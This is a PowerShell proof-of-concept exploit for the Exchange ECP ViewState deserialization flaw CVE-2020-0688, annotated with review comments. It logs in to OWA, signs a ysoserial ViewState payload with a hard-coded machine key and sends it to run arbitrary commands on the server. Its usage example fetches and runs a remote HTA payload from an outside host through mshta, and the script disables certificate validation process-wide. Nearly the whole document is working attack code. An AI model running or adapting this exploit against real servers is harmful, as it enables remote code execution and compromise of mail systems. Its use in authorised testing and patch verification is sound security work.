<#
Proof-of-concept for CVE-2020-0688 (Exchange ECP ViewState deserialization).
Flow, as written: (1) authenticate to OWA with the supplied credentials,
(2) take the ASP.NET_SessionId cookie, (3) have the external ysoserial.exe
build a signed ViewState using the hard-coded validation key / generator,
(4) GET /ecp/default.aspx with that ViewState and treat a WebException as
"probably executed".

Review notes (code left untouched, see inline comments):
  - Certificate validation is disabled process-wide.
  - Credentials are interpolated into the POST body without URL-encoding.
  - `$fals` (not `$false`) and a non-ASCII dash in `–-islegacy` look like typos.
  - Success detection is any WebException, not an inspected status code.
Only run against systems you are authorized to test.

Parameters (all strings except -h):
  -h / -Help      print usage
  -s / -server    base URL of the Exchange host, e.g. https://mail.x.com/
  -u / -username  account used for the OWA login
  -p / -password  its password
  -c / -command   command embedded in the ysoserial payload
#>
function exchange
{
param( [alias("Help")][switch]$h=$false, [alias("server")][String]$s, [alias("username")][String]$u, [alias("password")][String]$p, [alias("command")][String]$c
)
# Usage text; returned (not written) when any required argument is missing or -h is given.
$Help = " CVE-2020-0688 EXP Usage: exchange [-h] -s SERVER -u USER -p PASSWORD -c CMD Examples: exchange -s https://mail.x.com/ -u user@x.com -p passwd -c `"cmd.exe /c mshta http://1.1.1.1/test.hta`" "
if(!$s){return $Help}
if(!$u){return $Help}
if(!$p){return $Help}
if(!$c){return $Help}
if($h){return $Help}
# System.Web is needed only for HttpUtility::UrlEncode further down.
[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null
# SECURITY: accepts any server certificate for the whole process, not just this request.
# The credentials posted below can therefore be intercepted by anyone who can MITM the
# connection; scope this to the target or restore the callback afterwards.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$url =$s
$target="$s/owa/auth.owa"
# destination is percent-encoded; note that username/password below are not.
$destination=[uri]::EscapeDataString("$url/ecp/")
$username=$u
$pass=$p
$command=$c
# Hard-coded ViewState generator and machineKey validation key. The exploit only works
# if the target still signs ViewState with these static values (i.e. is unpatched /
# has not been re-keyed); the script never verifies that.
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
# BUG: $pass and $username are interpolated raw into a form body. Any '&', '+', '%' or '='
# in the password silently corrupts the request (the login then "fails"). Encode them the
# way $destination is encoded above. Also: if -s is plain http:// this is a cleartext login.
$postData="flags=4&password=$pass&destination=$destination&passwordText=&isUtf8=1&username=$username&forcedownlevel=0"
$CookieContainer = New-Object System.Net.CookieContainer
# ASCII encoding: non-ASCII characters in the credentials are replaced with '?'.
$buffer = [text.encoding]::ascii.getbytes($postData)
[net.httpWebRequest] $req = [net.webRequest]::create($target)
$req.method = "POST"
$req.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
$req.Headers.Add("Accept-Language: zh-CN,zh;q=0.9,en;q=0.8")
# Advertises compression but never sets AutomaticDecompression, so $result (unused) may be compressed bytes.
$req.Headers.Add("Accept-Encoding: gzip, deflate, br")
$req.Headers.Add("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7")
$req.Headers.Add("Origin: $url")
$req.Headers.Add("Sec-Fetch-Dest: document")
$req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"
# One redirect is followed so the final ResponseUri can be used as the login-success signal.
$req.AllowAutoRedirect = $true
$req.MaximumAutomaticRedirections= 1
$req.ContentLength = $buffer.length
$req.TimeOut = 50000
$req.KeepAlive = $true
$req.CookieContainer = $CookieContainer
$reqst = $req.getRequestStream()
$reqst.write($buffer, 0, $buffer.length)
$reqst.flush()
$reqst.close()
[net.httpWebResponse] $res = $req.getResponse()
# The session cookie is what ysoserial signs the ViewState for (--viewstateuserkey). If the
# server set no ASP.NET_SessionId this is $null and the payload is silently wrong.
$SessionId=($res.Cookies['ASP.NET_SessionId']).value
$resst = $res.getResponseStream()
$sr = new-object IO.StreamReader($resst)
$result = $sr.ReadToEnd()
$res.close()
# Login is judged failed only if we were bounced back to the logon page.
$l=($res.ResponseUri.LocalPath)
if ($l -like '/owa/auth/logon.aspx'){
write-host "[!] Login Incorrect, please try again with a different account..`n"
# NOTE(review): there is no enclosing loop, so this `break` propagates out of the
# function and is likely to terminate the calling script; `return` is what is meant.
break
}
write-host "[+] Login successfully!`n`n"
# Echo of the ysoserial command (note: echoed with `-islegacy`, executed with `–-islegacy`).
write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug -islegacy`n"
# BUG: the last flag starts with an EN DASH (U+2013) followed by '-', not two ASCII hyphens,
# so ysoserial.exe receives a literal "–-islegacy" argument. Requires ysoserial.exe in the CWD.
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug –-islegacy
# With --isdebug the tool prints several lines; -match on the array keeps only the line(s)
# that look like base64, i.e. the payload. If $yso is a single string, -match returns a
# boolean instead and $generator becomes True/False (presumably not intended — verify).
$generator=$yso -match "^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"
$Encode = [System.Web.HttpUtility]::UrlEncode($generator)
# The bare '+' is passed as an argument, so the printed line contains a literal '+'.
write-host "[+] Exp url:" +"$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
$url2="$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
try {
[net.httpWebRequest] $req2 = [net.webRequest]::create($url2)
$req2.Method = "GET"
$req2.Accept = "text/html"
# BUG: `$fals` is an undefined variable, not `$false`. It evaluates to $null and so happens
# to disable redirects, but fails under Set-StrictMode.
$req2.AllowAutoRedirect = $fals
# Re-uses the authenticated session cookie from the login above.
$req2.CookieContainer = $CookieContainer
$req2.TimeOut = 50000
# $res2 is never closed/disposed.
[net.httpWebResponse] $res2 = $req2.getResponse()
# A clean 200 means the ViewState was rejected or ignored.
write-host "[-] Failed!"
# NOTE(review): any WebException lands here — timeouts, 401/403/404 and TLS errors included —
# not just the 500 the message claims. Inspect $_.Exception.Response.StatusCode before
# reporting success.
}catch [System.Net.WebException] {
write-host "[*] Status code: 500, Maybe success!"
}
}
# Script runs the function immediately when dot-sourced/executed; with no args it returns $Help.
exchange